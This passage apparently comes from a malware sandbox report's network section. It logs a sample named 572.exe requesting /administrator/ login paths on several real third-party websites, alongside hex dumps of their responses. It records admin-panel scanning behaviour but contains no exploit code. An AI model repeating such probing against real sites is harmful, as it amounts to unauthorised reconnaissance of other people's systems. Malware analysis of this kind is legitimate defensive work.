                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6a6b5212da-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c 29 ce ed 4b e2 c8 2a ae bb 29 10 60 8b db de 66 d1 2e 0e 8b 80 22 47 16 2f 14 a9 92 94 15 23 cd 7f 2f 28 4a b6 fc 92 5c 17 2d 10 20 a2 38 7c 66 e6 e1 33 23 d2 c9 c9 c7 5f 3e dc 7d fb 7c 03 85 2d 45 3a 4a 4e c2 f0 37 9e 83 b0 70 7b 03 ef bf a7 90 b8 09 a0 82 18 b3 08 a4 0a 7f 37 c0 f1 1d 28 c1 38 06 20 88 5c 2e 02 94 e1 d7 2f 41 0a c9 c9 6f 28 19 cf bf 87 e1 16 aa c3 01 38 0e f5 fe c7 a0 2e 5f 81 ba fc 01 a8 a5 ed d0 dc 8b 63 59 1e a2 84 e1 2e 52 81 84 a5 a3 c4 72 2b 30 fd d9 5a 94 96 2b 09 bf e2 bf 6a ae 91 9d c0 bf e1 83 50 35 cb 05 d1 98 c4 de 6e 94 94 68 09 d0 82 68 83 76 11 7c bd fb 6b 78 19 40 dc 4f 14 d6 56 a1 43 58 2d 82 0f 4a 3a d0 f0 6e 5d 61 00 d4 8f 16 81 c5 47 1b bb 78 af 37 30 af a1 fc 33 fc fa 73 f8 41 95 15 b1 3c 13 43 a0 db 9b c5 0d 5b e2 60 9d 24 25 2e 02 ad 32 65 cd c0 50 2a 2e 19 3e 4e 41 aa 5c 09 a1 9a 83 25 2b 8e 4d a5 b4 1d 2c 6a 38 b3 c5 82 e1 8a 53 0c db c1 94 4b 6e 39 11 a1 a1 44 e0 62 e6 51 04 97 0f a0 51 2c 02 63 d7 02 4d 81 68 03 e0 6c 11 d0 fc de bf 0a a9 31 01 14 1a f3 45 10 53 26 43 ba e4 b1 9f 8a 69 1e a1 d6 4a 9b a8 35 8a f7 35 7c f5 3d 7d d9 c5 d9 d6 05 47 e7 e5 ec 0f bd 70 ec 1d ed aa a1 35 4c 33 c5 d6 4f 25 d1 4b 2e e7 e7 d7 15 61 8c cb e5 fc fc 39 f1 40 e9 68 34 50 20 ba f8 66 e7 9d 06 47 89 a1 9a 57 36 1d 01 f0 1c c6 27 92 ac f8 92 58 a5 23 aa d4 03 c7 1b 49 32 81 6c 02 4f 23 57 02 0d 97 4c 35 11 61 ec 66 85 d2 7e e2 c6 a2 44 3d 3e fb f8 cb df 3a e5 7c 52 84 21 3b 9b 42 5e 4b da 8a 73 dc af 06 58 11 0d 1d b0 80 05 30 45 eb 12 a5 8d 96 68 6f 04 ba c7 bf ac 6f d9 f8 cc db 84 44 a0 b6 67 93 eb 6e 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c8Xmo_1Q,)K*)`f."G/#/(J\- 8|f3#_>}|-E:JN7p{7(8 \./Ao(8._cY.Rr+0Z+jP5nhhv|kx@OVCX-J:n]aGx703sA<C[`$%.2eP*.>NA\%+M,j8SKn9DbQQ,cMhl1ES&CiJ55|=}Gp5L3O%K.a9@h4P fGW6'X#I2lO#WL5af~D=>:|R!;B^KsX0EhooDgnu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.705082893 CET1192INData Raw: bf 32 6a f3 8a 18 37 95 20 6b 58 c0 59 26 14 7d 38 f3 76 cf 93 11 c0 f3 28 89 fb d4 0e aa 68 34 4a e2 ae 90 1c 77 2e f9 84 f1 55 b7 ff 61 a3 49 55 a1 0e d2 16 ae 9d e9 8a 94 e6 3e 24 e8 1f c2 76 83 dc b0 8b b8 1d 77 4a 1a e4 10 00 23 96 84 56 13
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2j7 kXY&}8v(h4Jw.UaIU>$vwJ#ViJ{L~Hej$f|52W3v&9Hv;6GP+6K]$~.1H(SXB%F.:$"UP7U~? :'WWWWUeZJ& [Q
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.705352068 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.796400070 CET234OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ag.ufa9999.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.917252064 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yVFSkXJDufHa9cqYPTBtGG2iX4EnLYKXpy%2FFcnsTEp3Q8bWWhnHe4FROoNiqVwnUAi50%2FtFeMHDmyJx7TbQY1Nw8Efg3TIRD5vMmtH1aHudBXRPU%2FtKx%2FusHTAzIW%2B76Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6bcc0112da-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 36 12 fe ee 5f 31 d1 01 89 0d 58 92 bd dd ed e6 45 56 d1 ee e6 80 00 7b e8 b6 9b 45 bb 28 16 01 45 8e 2c 36 14 a9 23 29 2b 46 2e ff bd a0 28 d9 f2 4b d2 5b dc 01 01 22 8a c3 67 66 1e 3e 33 22 9d 9c bc ff f9 dd ed 97 8f d7 50 d8 52 a4 a3 e4 24 0c ff e0 39 08 0b 37 d7 f0 f6 6b 0a 89 9b 00 2a 88 31 8b 40 aa f0 4f 03 1c bf 07 25 18 c7 00 04 91 cb 45 80 32 fc fc 29 48 21 39 f9 03 25 e3 f9 d7 30 dc 42 75 38 00 c7 a1 de 7e 1b d4 f9 0b 50 e7 df 00 b5 b4 1d 9a 7b 71 2c cb 43 94 30 dc 45 2a 90 b0 74 94 58 6e 05 a6 3f 5a 8b d2 72 25 e1 57 fc 77 cd 35 b2 13 f8 0f bc 13 aa 66 b9 20 1a 93 d8 db 8d 92 12 2d 01 5a 10 6d d0 2e 82 cf b7 ff 0c cf 03 88 fb 89 c2 da 2a 74 08 ab 45 f0 4e 49 07 1a de ae 2b 0c 80 fa d1 22 b0 f8 60 63 17 ef d5 06 e6 25 94 df c3 cf 3f 86 ef 54 59 11 cb 33 31 04 ba b9 5e 5c b3 25 0e d6 49 52 e2 22 d0 2a 53 d6 0c 0c a5 e2 92 e1 c3 14 a4 ca 95 10 aa 39 58 b2 e2 d8 54 4a db c1 a2 86 33 5b 2c 18 ae 38 c5 b0 1d 4c b9 e4 96 13 11 1a 4a 04 2e e6 1e 45 70 79 0f 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fc ab 90 1a 13 40 a1 31 5f 04 31 65 32 a4 4b 1e fb a9 98 e6 11 6a ad b4 89 5a a3 78 5f c3 17 5f d3 e7 5d 9c 6d 5d 70 74 5e ce fe d6 0b c7 de d1 ae 1a 5a c3 34 53 6c fd 58 12 bd e4 f2 72 76 55 11 c6 b8 5c 5e ce 9e 12 0f 94 8e 46 03 05 a2 8b 6f 3e eb 34 38 4a 0c d5 bc b2 e9 08 80 e7 30 3e 91 64 c5 97 c4 2a 1d 51 a5 ee 39 5e 4b 92 09 64 13 78 1c b9 12 68 b8 64 aa 89 08 63 d7 2b 94 f6 03 37 16 25 ea f1 d9 fb 9f ff d5 29 e7 83 22 0c d9 d9 14 f2 5a d2 56 9c e3 7e 35 c0 8a 68 e8 80 05 2c 80 29 5a 97 28 6d b4 44 7b 2d d0 3d fe b4 be 61 e3 33 6f 13 12 81 da 9e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c8Xmo6_1XEV{E(E,6#)+F.(K["gf>3"PR$97k*1@O%E2)H!9%0Bu8~P{q,C0E*tXn?Zr%Ww5f -Zm.*tENI+"`c%?TY31^\%IR"*S9XTJ3[,8LJ.Epy"0v-6@1_1e2KjZx__]m]pt^Z4SlXrvU\^Fo>48J0>d*Q9^Kdxhdc+7%)"ZV~5h,)Z(mD{-=a3o
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.917277098 CET1196INData Raw: 4d ae ba d5 fd ca a8 cd 2b 62 dc 54 82 ac 61 01 67 99 50 f4 fe cc db 3d 4d 46 00 4f a3 24 ee 53 3b a8 a2 d1 28 89 bb 42 72 dc b9 e4 13 c6 57 dd fe 87 8d 26 55 85 3a 48 5b b8 76 a6 2b 52 9a fb 90 a0 7f 08 db 0d 72 c3 2e e2 76 dc 29 69 90 43 00 8c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: M+bTagP=MFO$S;(BrW&U:H[v+Rr.v)iCXZM+qG72AQ 1u .K.\lK nEOAP,uo~DK[, ^Oaj(!C!Kb>D{5$1jUwR4&HF3`$v)9*x!i
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.917293072 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                158192.168.2.65507096.7.224.17880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.577598095 CET178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.688481092 CET635INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 277
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131690629_1611129006_213759684_14_8770_102_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 23 34 37 3b 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 39 30 26 23 34 36 3b 63 62 64 62 36 63 34 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;administrator&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131690&#46;cbdb6c4</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                159192.168.2.655069104.18.32.10980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.593239069 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.726685047 CET616INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://sport.autoplay.cloud/administrator/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=1kNN2gUP3zgUX0cJqc.xtfUNwbj6eYfeLSUo4qntzCw-1707131690-1-AUdWQ7LE/6Pa45WcLtswJlMWfW2ZVH8vUvwpOpBXkdVZJQdn3MCxSk/wkTupHhHGjdIAHq/TkiqF4V3Km9H79oo=; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6a8dd6673d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.182488918 CET356OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=1kNN2gUP3zgUX0cJqc.xtfUNwbj6eYfeLSUo4qntzCw-1707131690-1-AUdWQ7LE/6Pa45WcLtswJlMWfW2ZVH8vUvwpOpBXkdVZJQdn3MCxSk/wkTupHhHGjdIAHq/TkiqF4V3Km9H79oo=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.319546938 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42fdef673d-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db 38 12 fe ee 5f 31 d5 2d 22 1b b0 64 a7 2f db 5c 2c f9 b0 9b 66 71 01 da 6e 6f 9b 62 af 28 0a 83 22 47 16 13 8a d4 91 b4 1d 6f ea ff 7e a0 28 39 f2 4b b2 5b dc 01 01 62 92 c3 87 33 cf bc 90 a3 e4 d9 9b 5f 2f ae 3f 7f b8 84 c2 96 62 da 4b 9e 45 d1 17 9e 83 b0 70 75 09 af bf 4e 21 71 0b 40 05 31 26 0d a4 8a 6e 0c 70 fc 11 94 60 1c 03 10 44 ce d3 00 65 f4 e9 63 30 85 e4 d9 17 94 8c e7 5f a3 e8 01 aa c1 01 38 0e f5 fa fb a0 ce 9e 80 3a fb 0e a8 b9 6d d0 dc c4 31 2b 0f 51 a2 68 17 a9 40 c2 a6 bd c4 72 2b 70 fa 93 b5 28 2d 57 12 7e c3 ff 2c b8 46 f6 0c be c1 85 50 0b 96 0b a2 31 19 79 b9 5e 52 a2 25 40 0b a2 0d da 34 f8 74 fd 4b 74 16 c0 a8 5d 28 ac ad 22 87 b0 4c 83 0b 25 1d 68 74 bd ae 30 00 ea 47 69 60 f1 ce 8e 9c be 93 2d cc 53 28 ff 8e 3e fd 14 5d a8 b2 22 96 67 a2 0b 74 75 99 5e b2 39 76 f6 49 52 62 1a 68 95 29 6b 3a 82 52 71 c9 f0 6e 08 52 e5 4a 08 b5 3a d8 b2 e4 b8 aa 94 b6 9d 4d 2b ce 6c 91 32 5c 72 8a 51 3d 18 72 c9 2d 27 22 32 94 08 4c 4f 3d 8a e0 f2 16 34 8a 34 30 76 2d d0 14 88 36 00 ce d2 80 e6 33 3f 15 51 63 02 28 34 e6 69 30 a2 4c 46 74 ce 47 7e 69 44 f3 18 b5 56 da c4 b5 d0 68 3f 86 ff fe 75 fa f8 11 e1 c3 11 1c dd 29 e1 9f 9e c2 b1 3d 68 37 1a 6a c1 69 a6 d8 fa be 24 7a ce e5 f9 78 52 11 c6 b8 9c 9f 8f 37 89 07 9a f6 7a 9d 08 44 a7 df e9 b8 89 c1 5e 62 a8 e6 95 9d f6 00 78 0e fd 67 92 2c f9 9c 58 a5 63 aa d4 2d c7 4b 49 32 81 6c 00 f7 3d 97 02 2b 2e 99 5a c5 84 b1 cb 25 4a fb 96 1b 8b 12 75 3f 7c f3 eb bb 26 72 de 2a c2 90 85 43 c8 17 92 d6 c1 d9 6f 77 03 2c 89 86 06 58 40 0a 4c d1 45 89 d2 c6 73 b4 97 02 dd cf 9f d7 57 ac 1f 7a 99 88 08 d4 36 1c 4c 9a dd ed ce b8 b6 2b 66 dc 54 82 ac 21 85 30 13 8a de 86 5e 6e 33 e8 01 6c 7a c9 a8 35 ed 20 8b 7a bd 64 d4 24 92 e3 ce 19 9f 30 be 6c fc 1f ad 34 a9 2a d4 c1 b4 86 ab 57 9a 24 a5 b9 57 09 da 1f 51 ed 20 37 6c 34 ae c7 4d 24 75 6c 08 80 11 4b 22 ab 89 34 82 58 74 29 ee 88 9d 79 21 13 4c 3f 08 24 06 c1 4f 37 96 9a 38 19 31 be ec e8 d1 68 58 9f 12 31 b4 84 0b 97 33 5b ed 76 16 f6 0c 39 30 a5 59 76 da 3b 36 fc 2f 8f a0 96 a8 5d 7a 6d b7 ba ea 77 7a 60 44 4d fb cc 6d 16 5c 62 30 fd a8 b4 5e 0f 61 ad 16 50 90 25 42 86 28 a1 16 42 96 8c 8a d3 2e da f3 8e 26 66 91 3d 80 24 a6 22 f2 e0 a8 85 e7 cb aa 19 a1 14 8d 09 a6 9f d5 02 88 46 f0 2b 60 15 f8 95 64 e4 00 a6 40 16 56 b9 f8 88 a9 2b 88 c9 a8 78 be e5 a1 66 d5 85 05 8c e2 c6 f4 3a 2e 8e d2 64 d0 87 b1 a3 89 cf 0b c1 e7 85 ed f2 72 94 d4 8e c0 21 20 d5 88 d2 14 ca 46 ae 70 11 2e 3d f5 9d f9 7c 21 c4 0e 04 c0 ce 00 c0 b3 f4 00 2a 55 67 3f f8 30 9c 36 54 3c 86 d3 89 ae 83 e1 0e 47 94 54 96 16 a4 a3 ee 5f a2 eb 90 8b 3d 59 aa c4 a2
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 86dXmo8_1-"d/\,fqnob("Go~(9K[b3_/?bKEpuN!q@1&np`Dec0_8:m1+Qh@r+p(-W~,FP1y^R%@4tKt]("L%ht0Gi`-S(>]"gtu^9vIRbh)k:RqnRJ:M+l2\rQ=r-'"2LO=440v-63?Qc(4i0LFtG~iDVh?u)=h7ji$zxR7zD^bxg,Xc-KI2l=+.Z%Ju?|&r*Cow,X@LEsWz6L+fT!0^n3lz5 zd$0l4*W$WQ 7l4M$ulK"4Xt)y!L?$O781hX13[v90Yv;6/]zmwz`DMm\b0^aP%B(B.&f=$"F+`d@V+xf:.dr! Fp.=|!*Ug?06T<GT_=Y
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.319566011 CET1286INData Raw: 94 06 ec 4a 3d 45 98 17 db e3 c3 45 d0 d1 78 44 36 5b 15 eb 4e 54 fe 5e ac 7d 38 5e ed 04 e4 3f 7c 48 ec 82 56 4f 62 fa c4 0a a6 d7 05 37 b0 c2 cc 70 8b c0 0d 2c 0c 97 73 20 60 90 2e 34 b7 6b 30 2e 7d 68 1d 94 95 56 16 a9 05 6e 0d 8a 1c 72 ad 4a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: J=EExD6[NT^}8^?|HVOb7p,s `.4k0.}hVnrJPiZBoMY\XsW3X-vu.\&3`buFT,efZoE+(U!@UYY/D4*:dTMVF%G$\SF;NvAcI;w
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.319581985 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                160192.168.2.655068138.197.59.19980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.594302893 CET187OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.712445021 CET570INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 343
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/administrator/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.034995079 CET196OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.153325081 CET588INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 352
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
